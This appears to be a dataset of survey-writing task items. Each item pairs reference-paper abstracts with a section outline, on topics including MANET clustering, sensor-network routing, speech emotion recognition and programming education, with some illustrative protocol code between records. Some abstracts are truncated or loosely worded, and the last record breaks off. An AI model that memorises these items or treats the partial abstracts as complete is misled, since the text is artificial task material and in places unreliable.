Flexible Weighted Clustering Algorithm based on Battery Power (FWCABP), leads to a high degree of stability in the network, minimizing the number of clusters, and minimizing the overhead for the clustering formation and maintenance by keeping a node with weak battery power from being elected as a cluster-head. 
Simulation experiments are conducted to evaluate the performance of our algorithm in terms of the number of clusters formed, reaffiliation frequency, and number of cluster-head change. Results show that our algorithm performs better than existing ones and is also tunable to different kinds of network conditions. --- paper_title: A mobility based metric for clustering in mobile ad hoc networks paper_content: We present a novel relative mobility metric for mobile ad hoc networks (MANETs). It is based on the ratio of power levels due to successive receptions at each node from its neighbors. We propose a distributed clustering algorithm, MOBIC, based on the use of this mobility metric for selection of clusterheads, and demonstrate that it leads to more stable cluster formation than the "least clusterhead change" version of the well known Lowest-ID clustering algorithm (Chiang et al., 1997). We show reduction of as much as 33% in the rate of clusterhead changes owing to the use of the proposed technique. In a MANET that uses scalable cluster-based services, network performance metrics such as throughput and delay are tightly coupled with the frequency of cluster reorganization. Therefore, we believe that using MOBIC can result in a more stable configuration, and thus yield better performance. --- paper_title: Adaptive Power-Aware Clustering and Multicasting Protocol for Mobile Ad Hoc Networks paper_content: One of the most critical issues in wireless ad hoc networks is represented by the limited availability of energy within network nodes. Most of the researches focused on the problem of routing issues rather than energy efficiency or prolongation of network lifetime. In this paper, we proposed a multicast power greedy clustering algorithm (termed as MPGC) with the mesh scheme in the multicasting protocol of ad hoc wireless networks. The greedy heuristic clustering partitions a large-scale ad hoc network into a hierarchical cluster structure. Nodes in a cluster determine adaptively their power levels so as to be power efficient. The clusterheads acting as the agents of transmit- ters/receivers can reduce efficiently bandwidth consumption and complexity of mesh structures. Besides, the mechanism of cluster maintenance can remarkably prolong the network lifetime. The power aware multicasting protocol based on ODMRP executes suitably on the super-nodes topology formed by clusterheads. The results of the simulation show that our scheme achieves better performance for ad hoc networks, in terms of network lifetime and network scalability. --- paper_title: A Flexible Weight Based Clustering Algorithm in Mobile Ad hoc Networks paper_content: Clustering has been proven to be a promising approach for mimicking the operation of the fixed infrastructure and managing the resources in multi-hop networks. In order to achieve good performance, the formation and maintenance procedure of clusters should operate with minimum overhead, allowing mobile nodes to join and leave without perturbing the membership of the cluster and preserving current cluster structure as much as possible. In this paper, we propose a Flexible Weight Based Clustering Algorithm (FWCA) in Mobile Ad hoc Networks. The goals are yielding low number of clusters, maintaining stable clusters, minimizing the number of invocations for the algorithm and maximizing lifetime of mobile nodes in the system. 
Through simulations we have compared the performance of our algorithm with that of WCA in terms of the number of clusters formed, the number of re-affiliations, the number of state transitions on each clusterhead and the number of clusterhead changes. The results demonstrate the superior performance of the proposed algorithm. --- paper_title: Topology Control Protocols to Conserve Energy in Wireless Ad Hoc Networks paper_content: In wireless ad hoc networks and sensor networks, energy use is in many cases the most important constraint since it corresponds directly to operational lifetime. This paper presents two topology control protocols that extend the lifetime of dense ad hoc networks while preserving connectivity, the ability for nodes to reach each other. Our protocols conserve energy by identifying redundant nodes and turning their radios off. Geographic Adaptive Fidelity (GAF) identifies redundant nodes by their physical location and a conservative estimate of radio range. Cluster-based Energy Conservation (CEC) directly observes radio connectivity to determine redundancy and so can be more aggressive at identifying duplication and more robust to radio fading. We evaluate these protocols through analysis, extensive simulations, and experimental results in two wireless testbeds, showing that the protocols are robust to variance in node mobility, radio propagation, node deployment density, and other factors. --- paper_title: Enhance topology control protocol(ECEC) to conserve energy based clustering in wireless ad hoc networks paper_content: The topology of a mobile ad hoc network is generally poorly defined or not defined at all. In such a network, data can be relayed or routed by intermediate nodes whose positions keep changing. Mobile ad hoc networks face challenges such as limited wireless transmission range, the broadcast nature of the wireless medium, hidden-terminal and exposed-terminal problems, packet losses due to transmission errors, mobility-induced route changes, mobility-induced packet losses, battery constraints, ease of snooping, and security problems. In wireless ad hoc networks and sensor networks, energy use is in many cases the most important constraint since it corresponds directly to operational lifetime. This paper presents new topology control protocols that extend the lifetime of dense ad hoc networks while preserving connectivity, the ability for nodes to reach each other. The protocols conserve energy by identifying redundant nodes and turning their radios off. Cluster-based Energy Conservation (CEC) directly observes radio connectivity to determine redundant nodes and so can be more aggressive at identifying duplication and more robust to radio fading. In CEC, if the lifetime of any gateway of the cluster (LTgateway) is less than the lifetime of the cluster (LTcluster), there is no connectivity in the network for an interval of LTcluster - LTgateway. Our protocol ensures that connectivity in the network is maintained even in this scenario while consuming minimum energy. In the proposed protocol (ECEC), nodes that can hear multiple cluster-heads broadcast their velocity, position, transmission rate and lifetime information; the cluster-head then sorts the gateway candidates according to the quality metric introduced in Section 3.2. After sorting, two nodes are selected as gateways, one as the primary gateway and the other as the reserved gateway. Reserved gateway nodes wake up after a time Tg, which is smaller than Ts, and announce themselves to the cluster-head; if the cluster-head does not answer them, they go back to sleep. --- paper_title: Performance Analysis of Clustering Protocols in Mobile Ad hoc Networks paper_content: Network clustering is an important technique widely used in efficient MANET network management, hierarchical routing protocol design, network modeling, Quality of Service, etc. Recently, many researchers have been focusing on clustering, which is one of the fundamental problems in mobile ad hoc networks. This article presents descriptions of recently proposed clustering algorithms, categorized into different approaches that support similar features. Based on a comparison of different performance metrics of the clustering algorithms, the most suitable one is recommended for various application scenarios. This study provides adequate information for researchers, helping them to analyze many avenues and to offer more effective and efficient clustering protocols for MANETs. --- paper_title: A survey of clustering schemes for mobile ad hoc networks paper_content: Clustering is an important research topic for mobile ad hoc networks (MANETs) because clustering makes it possible to guarantee basic levels of system performance, such as throughput and delay, in the presence of both mobility and a large number of mobile terminals. A large variety of approaches for ad hoc clustering have been presented, whereby different approaches typically focus on different performance metrics. This article presents a comprehensive survey of recently proposed clustering algorithms, which we classify based on their objectives. This survey provides descriptions of the mechanisms, evaluations of their performance and cost, and discussions of advantages and disadvantages of each clustering scheme. With this article, readers can have a more thorough and delicate understanding of ad hoc clustering and the research trends in this area. ---
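The MOBIC abstract earlier in this reference list bases clusterhead selection on a relative mobility metric computed from the ratio of received power levels of two successive packets from the same neighbour. The sketch below follows that idea; the decibel ratio, the variance-based aggregation across neighbours and the sample values are illustrative assumptions, not the exact constants of the published protocol.

```python
# Illustrative MOBIC-style relative mobility estimate.
import math
from statistics import pvariance

def relative_mobility_db(rx_power_new: float, rx_power_old: float) -> float:
    """Positive: neighbour is getting closer; negative: moving away."""
    return 10.0 * math.log10(rx_power_new / rx_power_old)

def aggregate_mobility(per_neighbour_values):
    """Low variance across neighbours -> node is relatively stable -> good
    clusterhead candidate (the node with the lowest value would be elected)."""
    return pvariance(per_neighbour_values)

# Invented successive received-power samples (old, new) from three neighbours.
samples = {"n1": (1.0e-9, 1.1e-9), "n2": (2.0e-9, 1.6e-9), "n3": (5.0e-10, 5.2e-10)}
rel = [relative_mobility_db(new, old) for old, new in samples.values()]
print("per-neighbour relative mobility (dB):", [round(v, 2) for v in rel])
print("aggregate mobility metric:", round(aggregate_mobility(rel), 3))
```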
Title: Survey of Clustering Schemes in Mobile Ad hoc Networks
Section 1: Introduction
Description 1: Introduce MANETs and the significance of clustering for routing, including a brief overview of hierarchical structures and challenges.
Section 2: Definition
Description 2: Define the process of clustering in MANETs, including roles of cluster head, gateway, and member nodes.
Section 3: Algorithms for Cluster Heads Election in MANETs
Description 3: Present various algorithms used for the election of cluster heads in MANETs.
Section 4: Related Work
Description 4: Summarize existing surveys and studies on clustering schemes in MANETs. Highlight their classifications and evaluation criteria.
Section 5: Clustering Schemes in Mobile Ad hoc Network
Description 5: Classify different clustering algorithms based on their objectives and cluster head election criteria, and provide detailed descriptions.
Section 6: Identifier Neighbor Based Clustering
Description 6: Discuss clustering schemes based on unique node IDs and their election processes.
Section 7: Topology Based Clustering
Description 7: Describe clustering schemes that use network topology metrics like node connectivity for cluster head selection.
Section 8: Mobility Based Clustering
Description 8: Explain clustering schemes based on the relative mobility of nodes and their impact on cluster stability.
Section 9: Energy Based Clustering
Description 9: Cover clustering algorithms focused on energy efficiency and conserving battery power of nodes.
Section 10: Weight Based Clustering
Description 10: Address clustering schemes that utilize a combination of weighted metrics for cluster head election.
Section 11: Comparison of Clustering Schemes
Description 11: Compare various clustering schemes in terms of performance metrics and effectiveness in MANETs.
Section 12: Conclusions
Description 12: Summarize key insights from the survey, including main characteristics, objectives, and performance of different clustering schemes.
A Survey on Routing Techniques of Data-Centric Wireless Sensor Networks
13
--- paper_title: A survey on routing protocols for wireless sensor networks paper_content: Recent advances in wireless sensor networks have led to many new protocols specifically designed for sensor networks where energy awareness is an essential consideration. Most of the attention, however, has been given to the routing protocols since they might differ depending on the application and network architecture. This paper surveys recent routing protocols for sensor networks and presents a classification for the various approaches pursued. The three main categories explored in this paper are data-centric, hierarchical and location-based. Each routing protocol is described and discussed under the appropriate category. Moreover, protocols using contemporary methodologies such as network flow and quality of service modeling are also discussed. The paper concludes with open research issues. --- paper_title: Adaptive protocols for information dissemination in wireless sensor networks paper_content: In this paper, we present a family of adaptive protocols, called SPIN (Sensor Protocols for Information via Negotiation), that efficiently disseminates information among sensors in an energy-constrained wireless sensor network. Nodes running a SPIN communication protocol name their data using high-level data descriptors, called meta-data. They use meta-data negotiations to eliminate the transmission of redundant data throughout the network. In addition, SPIN nodes can base their communication decisions both upon application-specific knowledge of the data and upon knowledge of the resources that are available to them. This allows the sensors to efficiently distribute data given a limited energy supply. We simulate and analyze the performance of two specific SPIN protocols, comparing them to other possible approaches and a theoretically optimal protocol. We find that the SPIN protocols can deliver 60% more data for a given amount of energy than conventional approaches. We also find that, in terms of dissemination rate and energy usage, the SPIN protocols perform close to the theoretical optimum.
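The SPIN abstract above centres on meta-data negotiation. The sketch below illustrates the commonly described three-message ADV/REQ/DATA exchange of the basic SPIN protocol; the class names and the in-memory "network" are assumptions made for illustration and do not reproduce the authors' implementation:

# Minimal sketch of a SPIN-style meta-data negotiation (ADV -> REQ -> DATA).
# Nodes advertise small meta-data descriptors first and send the full data only
# to neighbors that explicitly request it, suppressing redundant transmissions.

class Node:
    def __init__(self, name):
        self.name = name
        self.seen_metadata = set()   # meta-data descriptors already held
        self.data_store = {}

    def advertise(self, meta, neighbors):
        # Step 1: ADV carries only the (small) meta-data descriptor.
        for nbr in neighbors:
            if nbr.on_adv(meta, self):
                # Step 3: DATA is sent only to neighbors that answered with a REQ.
                nbr.on_data(meta, self.data_store[meta], self)

    def on_adv(self, meta, sender):
        # Step 2: REQ only if the advertised data is new to this node.
        return meta not in self.seen_metadata

    def on_data(self, meta, payload, sender):
        self.seen_metadata.add(meta)
        self.data_store[meta] = payload
        print(f"{self.name} received '{meta}' from {sender.name}")

a, b, c = Node("A"), Node("B"), Node("C")
a.data_store["temp-reading-42"] = b"...sensor payload..."
a.seen_metadata.add("temp-reading-42")

a.advertise("temp-reading-42", [b, c])   # both neighbors request, so DATA is sent twice
b.advertise("temp-reading-42", [a, c])   # A and C already have it: no REQ, no DATA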
--- paper_title: Next century challenges: scalable coordination in sensor networks paper_content: Networked sensors-those that coordinate amongst themselves to achieve a larger sensing task-will revolutionize information gathering and processing both in urban environments and in inhospitable terrain. The sheer numbers of these sensors and the expected dynamics in these environments present unique challenges in the design of unattended autonomous sensor networks. These challenges lead us to hypothesize that sensor network coordination applications may need to be structured differently from traditional network applications. In particular, we believe that localized algorithms (in which simple local node behavior achieves a desired global objective) may be necessary for sensor network coordination. In this paper, we describe localized algorithms, and then discuss directed diffusion, a simple communication model for describing localized algorithms. --- paper_title: Directed diffusion: a scalable and robust communication paradigm for sensor networks paper_content: Advances in processor, memory and radio technology will enable small and cheap nodes capable of sensing, communication and computation. Networks of such nodes can coordinate to perform distributed sensing of environmental phenomena. In this paper, we explore the directed diffusion paradigm for such coordination. Directed diffusion is datacentric in that all communication is for named data. All nodes in a directed diffusion-based network are application-aware. This enables diffusion to achieve energy savings by selecting empirically good paths and by caching and processing data in-network. We explore and evaluate the use of directed diffusion for a simple remote-surveillance sensor network. --- paper_title: Improving the Energy Efficiency of Directed Diffusion Using Passive Clustering paper_content: Directed diffusion is a prominent example of data-centric routing based on application layer data and purely local interactions. In its functioning it relies heavily on network-wide flooding which is an expensive operation, specifically with respect to the scarce energy resources of nodes in wireless sensor networks (WSNs). One well-researched way to curb the flooding overhead is by clustering. Passive clustering is a recent proposal for on-demand creation and maintenance of the clustered structure, making it very attractive for WSNs and directed diffusion in particular. The contribution of this paper is the investigation of this combination: Is it feasible to execute directed diffusion on top of a sensor network where the topology is implicitly constructed by passive clustering? A simulation-based comparison between plain directed diffusion and one based on passive clustering shows that, depending on the scenario, passive clustering can significantly reduce the required energy while maintaining and even improving the delay and the delivery rate. This study also provides insights into the behavior of directed diffusion with respect to its long-term periodic behavior, contributing to a better understanding of this novel class of communication protocols. --- paper_title: Nodes Credit based Direct Diffusion for wireless sensor networks paper_content: Sensor networks are emerging as a new tool for important applications in diverse fields like military surveillance, habitat monitoring, weather, home electrical appliances and others.
Technically, sensor network nodes are limited with respect to energy supply, computational capacity and communication bandwidth. In order to prolong the lifetime of the sensor nodes, designing efficient routing protocols is critical. In this paper, how information can effectively --- paper_title: Region Directed Diffusion in Sensor Network Using Learning Automata: RDDLA paper_content: One of the main challenges in wireless sensor networks is the energy problem and the lifetime of nodes in the network. Several methods can be used to increase node lifetime. One of these methods is load balancing across nodes while transmitting data from source to destination. The directed diffusion algorithm is one of the well-known data-centric methods in wireless sensor networks. Directed diffusion deals with two fundamental problems. First, data packets in the network traverse invalidated routes up to the central node in order to build new routes and eliminate the previous ones within a very short period of time; they are dispatched from a platform lacking any central node, which itself decreases data delivery rates. Second, the reconstruction of such routes requires an exploration phase, which involves the distribution of interest packets and exploratory data, resulting in a great deal of traffic injected into the network. With every movement, the exploration phase triggered by the central node produces an overflow of such traffic, and with intense movement this becomes especially significant. When there is more than one sink, the network is separated into regions, and the proposed algorithm, called Region Directed Diffusion Learning Automata (RDDLA), updates the routes between these sinks, finds an interface node using learning automata, sends packets from the source to this node, and transmits data to the sinks through it. This approach decreased overall network metrics by up to 22%. --- paper_title: Scalable Information-Driven Sensor Querying and Routing for Ad Hoc Heterogeneous Sensor Networks paper_content: This paper describes two novel techniques, information-driven sensor querying (IDSQ) and constrained anisotropic diffusion routing (CADR), for energy-efficient data querying and routing in ad hoc sensor networks for a range of collaborative signal processing tasks. The key idea is to introduce an information utility measure to select which sensors to query and to dynamically guide data routing. This allows us to maximize information gain while minimizing detection latency and bandwidth consumption for tasks such as localization and tracking. Our simulation results have demonstrated that the information-driven querying and routing techniques are more energy efficient, have lower detection latency, and provide anytime algorithms to mitigate risks of link/node failures. --- paper_title: The cougar approach to in-network query processing in sensor networks paper_content: The widespread distribution and availability of small-scale sensors, actuators, and embedded processors is transforming the physical world into a computing platform. One such example is a sensor network consisting of a large number of sensor nodes that combine physical sensing capabilities such as temperature, light, or seismic sensors with networking and computation capabilities. Applications range from environmental control, warehouse inventory, and health care to military environments.
Existing sensor networks assume that the sensors are preprogrammed and send data to a central frontend where the data is aggregated and stored for offline querying and analysis. This approach has two major drawbacks. First, the user cannot change the behavior of the system on the fly. Second, conservation of battery power is a major design factor, but a central system cannot make use of in-network programming, which trades costly communication for cheap local computation. In this paper, we introduce the Cougar approach to tasking sensor networks through declarative queries. Given a user query, a query optimizer generates an efficient query plan for in-network query processing, which can vastly reduce resource usage and thus extend the lifetime of a sensor network. In addition, since queries are asked in a declarative language, the user is shielded from the physical characteristics of the network. We give a short overview of sensor networks, propose a natural architecture for a data management system for sensor networks, and describe open research problems in this area. ---
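The Cougar abstract above argues for in-network query processing, trading cheap local computation for costly communication. The sketch below illustrates that idea for a simple average query, with cluster leaders computing partial aggregates; the node layout and readings are hypothetical and not taken from the Cougar system itself:

# Sketch of in-network aggregation for a declarative query such as
# "SELECT AVG(temperature) FROM sensors": each cluster leader combines the
# readings of its member nodes into a partial aggregate (sum, count), and only
# the small partial aggregates travel to the gateway, not every raw reading.

clusters = {                       # leader -> raw readings of its member nodes
    "leader_1": [21.5, 22.0, 21.8],
    "leader_2": [19.9, 20.4],
    "leader_3": [23.1, 22.7, 23.0, 22.9],
}

def partial_aggregate(readings):
    """Computed locally at a cluster leader; one small record per cluster."""
    return (sum(readings), len(readings))

def gateway_combine(partials):
    """Computed at the gateway/front-end from the partial aggregates."""
    total = sum(s for s, _ in partials)
    count = sum(c for _, c in partials)
    return total / count

partials = [partial_aggregate(r) for r in clusters.values()]
raw_messages = sum(len(r) for r in clusters.values())
print(f"messages to gateway: {len(partials)} partials instead of {raw_messages} raw readings")
print(f"AVG(temperature) = {gateway_combine(partials):.2f}")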
Title: A Survey on Routing Techniques of Data-Centric Wireless Sensor Networks
Section 1: INTRODUCTION
Description 1: This section introduces the basic concepts of wireless sensor networks (WSNs), including their architecture, components, and applications, and discusses the challenges and design criteria for WSNs.
Section 2: ROUTING
Description 2: This section defines the process of routing in WSNs, describes the characteristics that routing protocols should possess, and introduces the various protocols designed to efficiently route data within WSNs.
Section 3: Characteristics for a routing protocol
Description 3: This section outlines the specific characteristics that routing protocols in WSNs should have to ensure efficient and reliable data transmission, including fault tolerance, adaptability, and scalability.
Section 4: Data-Centric Routing Protocols in Wireless Sensor Networks
Description 4: This section provides an overview of data-centric routing protocols, explaining the concept of attribute-based naming and how these protocols operate within WSNs.
Section 5: Flooding
Description 5: This section describes the flooding technique used for routing in WSNs, its mechanisms, and the problems associated with it, such as implosion, overlapping, and resource blindness.
Section 6: Gossiping
Description 6: This section explains the gossiping protocol, a modification of the flooding technique, and discusses its mechanism and associated issues such as data redundancy.
Section 7: SPIN
Description 7: This section introduces the Sensor Protocols for Information via Negotiation (SPIN), detailing its approach to overcome the problems of flooding and gossiping through data negotiation.
Section 8: Directed Diffusion
Description 8: This section explains the directed diffusion protocol, an application-aware and data-centric approach, and discusses its phases, variants, and improvements for energy efficiency.
Section 9: Rumor Routing
Description 9: This section describes the Rumor Routing protocol, a variant of directed diffusion suited for cases with infrequent events, outlining its operational principles and efficiency considerations.
Section 10: Gradient Based Routing
Description 10: This section introduces Gradient-Based Routing, detailing its mechanism of leveraging node height to route data and the different data spreading techniques it uses.
Section 11: Constrained Anisotropic Diffusion routing protocol
Description 11: This section discusses the Constrained Anisotropic Diffusion routing protocol (CADR), an extension of directed diffusion, focusing on its methodologies to maximize information gain and minimize communication costs.
Section 12: COUGAR
Description 12: This section presents the data-centric routing protocol COUGAR, emphasizing its query plan generation, leader selection for data aggregation, and the handling of data flow in WSNs.
Section 13: Conclusion
Description 13: This section sums up the discussion on data-centric routing protocols in WSNs, highlighting their importance, the challenges they address, and the future direction for research.
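Several of the protocols listed in this outline (directed diffusion and gradient-based routing in particular) revolve around interest propagation and gradient setup. The sketch below illustrates the general idea of flooding an interest from the sink, recording at each node the neighbour the interest arrived from, and sending data back along those gradients; path reinforcement is omitted, and the topology and message handling are assumptions made purely for illustration, not the protocol's actual packet layout:

from collections import deque

# Sketch of directed-diffusion-style interest flooding and gradient setup:
# the sink floods an interest; every node remembers the neighbor the interest
# arrived from (its gradient), and sensed data follows the gradients back.

topology = {                       # undirected links, hypothetical network
    "sink": ["a", "b"],
    "a": ["sink", "c"],
    "b": ["sink", "c", "d"],
    "c": ["a", "b", "source"],
    "d": ["b"],
    "source": ["c"],
}

def flood_interest(sink):
    """Breadth-first interest flooding; returns gradient[node] = next hop toward the sink."""
    gradient, frontier = {}, deque([sink])
    while frontier:
        node = frontier.popleft()
        for nbr in topology[node]:
            if nbr not in gradient and nbr != sink:
                gradient[nbr] = node      # the interest reached nbr via `node`
                frontier.append(nbr)
    return gradient

def send_data(source, sink, gradient):
    """Data walks the stored gradients back toward the sink."""
    path, node = [source], source
    while node != sink:
        node = gradient[node]
        path.append(node)
    return path

gradients = flood_interest("sink")
print("gradients:", gradients)
print("data path:", " -> ".join(send_data("source", "sink", gradients)))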
Recognition of Emotion from Speech: A Review
8
---
Title: Recognition of Emotion from Speech: A Review
Section 1: Introduction
Description 1: Write an overview of emotional speech recognition, its importance, challenges, and applications. Summarize the structure of the paper.
Section 2: Basic framework for emotional recognition
Description 2: Describe the fundamental components and processes involved in emotional speech recognition frameworks.
Section 3: Emotional speech database
Description 3: Explain the criteria for evaluating emotional speech databases and the types of databases used in speech emotion recognition.
Section 4: Acoustic characteristics of emotions in speech
Description 4: Discuss the prosodic and acoustic features that are crucial for identifying different emotional states in speech.
Section 5: Feature extraction and classification
Description 5: Detail the methods for preprocessing, feature extraction, feature selection, and classification algorithms used in speech emotion recognition.
Section 6: Applications
Description 6: Explore the various applications of emotion detection from speech in different domains such as intelligent tutoring systems, lie detection, banking, in-car systems, and more.
Section 7: Conclusion
Description 7: Summarize the key points and findings of the paper. Highlight the importance of an effective database and classifier in the performance of SER systems. Discuss the future directions and potential advancements in the field.
Section 8: References
Description 8: Provide a list of references cited throughout the paper.
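Sections 4 and 5 of this outline concern acoustic features and classification. The sketch below illustrates the overall pipeline on synthetic signals, using two simple stand-in features (short-time energy and zero-crossing rate) and a nearest-centroid classifier; real systems surveyed in this literature use richer features such as pitch contours and MFCCs and stronger classifiers, so this is only a shape-of-the-pipeline example with invented data and labels:

import numpy as np

# Toy speech-emotion-recognition pipeline: frame the signal, extract two simple
# acoustic features (short-time energy, zero-crossing rate), average them per
# utterance, and classify with a nearest-centroid rule. Signals are synthetic.

rng = np.random.default_rng(0)
SR, FRAME = 8000, 200                       # sample rate and frame length (samples)

def synth_utterance(amplitude, noisiness, seconds=1.0):
    """Stand-in for a recorded utterance (higher amplitude/noise ~ more 'aroused')."""
    t = np.arange(int(SR * seconds)) / SR
    return amplitude * np.sin(2 * np.pi * 150 * t) + noisiness * rng.standard_normal(t.size)

def features(signal):
    """Mean short-time energy and mean zero-crossing rate over all frames."""
    n_frames = signal.size // FRAME
    frames = signal[: n_frames * FRAME].reshape(n_frames, FRAME)
    energy = np.mean(frames ** 2, axis=1)
    zcr = np.mean(np.abs(np.diff(np.sign(frames), axis=1)) > 0, axis=1)
    return np.array([energy.mean(), zcr.mean()])

# Tiny labelled training set (labels and signal parameters are invented).
train = {
    "neutral": [features(synth_utterance(0.3, 0.05)) for _ in range(5)],
    "angry":   [features(synth_utterance(1.0, 0.40)) for _ in range(5)],
}
centroids = {label: np.mean(vecs, axis=0) for label, vecs in train.items()}

def classify(signal):
    f = features(signal)
    return min(centroids, key=lambda label: np.linalg.norm(f - centroids[label]))

print(classify(synth_utterance(0.95, 0.35)))   # expected: angry
print(classify(synth_utterance(0.25, 0.05)))   # expected: neutral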
Learning and teaching programming: A review and discussion
14
--- paper_title: Programming pedagogy—a psychological overview paper_content: Can we turn novices into experts in a four-year undergraduate program? If so, how? If not, what is the best we can do? While every teacher has his/her own opinion on these questions, psychological studies over the last twenty years have started to furnish scientific answers. Unfortunately, few of these results have been incorporated into curricula or textbooks. This report is a brief overview of some of the more important results concerning computer programming and how they can affect course design. --- paper_title: Zero Defect Software: Cleanroom Engineering paper_content: Publisher Summary Software is either correct or incorrect in design to a specification, in contrast with hardware that is reliable to a certain level in performing to a correct design. Certifying the correctness of such software requires two conditions—namely, statistical testing with inputs characteristic of actual usage, and no failures in the testing. Cleanroom Engineering introduces new levels of practical precision for achieving correct software, using three engineering teams—namely, specification engineers, development engineers, and certification engineers. Software can be developed and certified as correct under statistical quality control (SQC) to well-formed specifications of user requirements. The chapter discusses the history and application of SQC to software development. Two major properties of Cleanroom Engineering are: no debugging by the developers before the software goes to independent testers, and statistical testing taking into account both the usage and the criticalness of software parts. Cleanroom software engineering achieves statistical quality control over software development by strictly separating the design process from the testing process in a pipeline of incremental software development. The three major engineering activities in this process are software specification, software development, and software certification. The chapter elaborates on statistical quality control in software engineering. Markov chain techniques for software certification are discussed. The cleanroom engineering methods are outlined. Box Structured Software System Design is discussed. --- paper_title: Software Metrics: An Analysis and Evaluation paper_content: Software metrics is a new area of computer science designed to enable programmers and other practitioners to assign quantitative indexes of merit to software. In this volume, "software" is defined broadly as a generic for all the stages of tailoring a computer system to solve a problem. "Software Metrics" is the first book to survey this new area, measuring its present extent, describing its characteristic features, and indicating directions of potential expansion. The aim of the articles included in the book is to provide precise, quantified answers to such questions as: What are the memory requirements of the software? The speed requirements? What is the cost of production? The likely time schedule of production? When will it have to be replaced? What manpower loading should be used? How close to its limits is the system expected to run? What levels of satisfactory testing are sufficient? How well does the testing environment approximate the execution environment? What is the enhancement cost? To what extent has the problem--of the technology--moved beyond the program?
Would it cost less to rebuild the system than to maintain and enhance it? "In software, evolutionary complexity is probably more important than the classical time and space measures with which computer science has been concerned so far," the editors note in their introductory overview. This overview gauges the range of the book's fifteen contributions by the major developers of software metrics. --- paper_title: Software Engineering Economics paper_content: This paper summarizes the current state of the art and recent trends in software engineering economics. It provides an overview of economic analysis techniques and their applicability to software engineering and management. It surveys the field of software cost estimation, including the major estimation techniques available, the state of the art in algorithmic cost models, and the outstanding research issues in software cost estimation. --- paper_title: Studying the Novice Programmer paper_content: Parallel to the growth of computer usage in society is the growth of programming instruction in schools. This informative volume unites a wide range of perspectives on the study of novice programmers that will not only inform readers of empirical findings, but will also provide insights into how novices reason and solve problems within complex domains. The large variety of methodologies found in these studies helps to improve programming instruction and makes this an invaluable reference for researchers planning studies of their own. Topics discussed include historical perspectives, transfer, learning, bugs, and programming environments. --- paper_title: Expert Software Design Strategies paper_content: Early studies on programming have neglected design strategies actually implemented by expert programmers. Recent studies observing designers in real(istic) situations show these strategies to be deviating from the top-down and breadth-first prescriptive model, and leading to an opportunistically organized design activity. The main components of these strategies are presented here. Consequences are drawn from the results for the specification of design support tools, as well as for programmers' training. --- paper_title: Knowledge exploited by experts during software system design paper_content: High-level software design is characterized by incompletely specified requirements, no predetermined solution path, and by the integration of multiple domains of knowledge at various levels of abstraction. The application of data-driven knowledge rules characterizes expertise. A verbal protocol study describes these domains of knowledge and how experts exploit their rich knowledge during design. It documents how designers heavily rely on problem domain scenario simulations throughout solution development. These simulations trigger the inferences of new requirements and complete the requirement specification. Designers recognize partial solutions at various levels of abstraction in the design decomposition through the application of data-driven rules. Designers also rely heavily on simulations of their design solutions, but these are shallow, that is, limited to one level of abstraction in the solution. The findings also illustrate how designers capitalize on design methods, notations, and specialized software design schemas. Finally, the study describes how designers exploit powerful heuristics and personalized evaluation criteria to constrain the design process and select a satisfactory solution.
Studies, such as this one, help map the road to understanding expertise in complex tasks. --- paper_title: Models and theories of programming strategy paper_content: Abstract Much of the literature concerned with understanding the nature of programming skill has focused explicitly upon the declarative aspects of programmers' knowledge. This literature has sought to describe the nature of stereotypical programming knowledge structures and their organization. However, one major limitation of many of these knowledge-based theories is that they often fail to consider the way in which knowledge is used or applied. Another strand of literature is less well represented. This literature deals with the strategic elements of programming skill and is directed towards an analysis of the strategies commonly employed by programmers in the generation and the comprehension of programs. In this paper an attempt is made to unify various analyses of programming strategy. This paper presents a review of the literature in this area, highlighting common themes and concerns, and proposes a model of strategy development which attempts to encompass the central findings of previous research in this area. It is suggested that many studies of programming strategy are descriptive and fail to explain why strategies take the form they do or to explain the typical strategy shifts which are observed during the transitions between different levels of skill. This paper suggests that what is needed is an explanation of programming skill that integrates ideas about knowledge representation with a strategic model, enabling one to make predictions about how changes in knowledge representation might give rise to particular strategies and to the strategy changes associated with developing expertise. This paper concludes by making a number of brief suggestions about the possible nature of this model and its implications for theories of programming expertise. --- paper_title: Expert Programming Knowledge: A Strategic Approach paper_content: This chapter considers an alternative to the ‘programming plan’ view of programming expertise, namely that expert programmers have a much wider repertoire of strategies available to them as they program than do novices. This analysis does not dispute that experts have ‘plan-like’ knowledge, but questions the importance of the knowledge itself versus an understanding of when or how to use that knowledge. This chapter will firstly examine evidence which challenges the completeness of the plan-based theory and then it will look at evidence which reveals explicit strategic differences. As the studies are presented a list of strategies available to experts will be maintained. Although the emphasis of this section of the book is on expert performance, the chapter concludes with a brief look at studies of novices, since the strategic approach includes the assumption that the strategies used by novices are different from those available to experts. From all these studies it will be seen that experts choose strategies in response to factors such as unfamiliar situations, differing task characteristics and different language requirements, whilst many problems for novice programmers stem not only from lack of knowledge, but also from the lack of an adequate strategy for coping with the programming problem. The previous chapter has presented studies of expertise in computer programming that have concentrated on the content and structure of expert knowledge.
The dominant concept has been the ‘programming plan’, which has been proposed as the experts' mental representation of programming knowledge, and which has been used in the development of programming tutors and environments for novice programmers. This chapter examines those aspects of expertise that are not easily explained by plan-based theories. It is intended that the strategic approach described in this chapter should be seen as a complementary, rather than alternative, explanation of expertise. As the various studies are described a list of important strategies which programmers may use will be developed. The studies that are to be presented reveal problems with two implications of the plan-based approach: (1) that ‘programming plans’ provide a complete explanation of expert programming behaviour; and (2) that a novice can be defined as someone who does not possess this expert knowledge. An important, but often implicit assumption of the plan-based theorists is that the cognitive processes underlying programming are relatively straightforward. Often based on ideas from artificial intelligence, these processes are taken to be general problem-solving skills (cf. SOAR, Laird et al., 1987; ACT*, Anderson, 1983), which a novice programmer also possesses. The learning of computer programming is the acquisition of the appropriate knowledge structures for the problem-solving skills to use. These knowledge structures may then be labelled ‘plans’ (see Chapter 3.1 for more details), though other possibilities exist. The critical feature is that expertise is seen as the acquisition of knowledge. The alternative position is that expertise in programming may involve a variety of cognitive processes which, coupled with changes in knowledge, can give rise to a choice of different methods for solving any particular programming problem. These different methods can be termed strategies. The critical feature of the strategy argument is that observations of novice-expert differences can be caused by either knowledge differences, processing differences, or both. Any assessment of this argument has two important strands. Firstly some evidence questioning the plan-based theory will be presented (evidence for the theory has been covered by the previous chapter) and then evidence of strategic differences will be described. For these reasons it is important that the evidence for alternative aspects to expertise beyond the plan-based theories is carefully considered. --- paper_title: Programming pedagogy—a psychological overview paper_content: Can we turn novices into experts in a four-year undergraduate program? If so, how? If not, what is the best we can do? While every teacher has his/her own opinion on these questions, psychological studies over the last twenty years have started to furnish scientific answers. Unfortunately, few of these results have been incorporated into curricula or textbooks. This report is a brief overview of some of the more important results concerning computer programming and how they can affect course design. --- paper_title: Studying the Novice 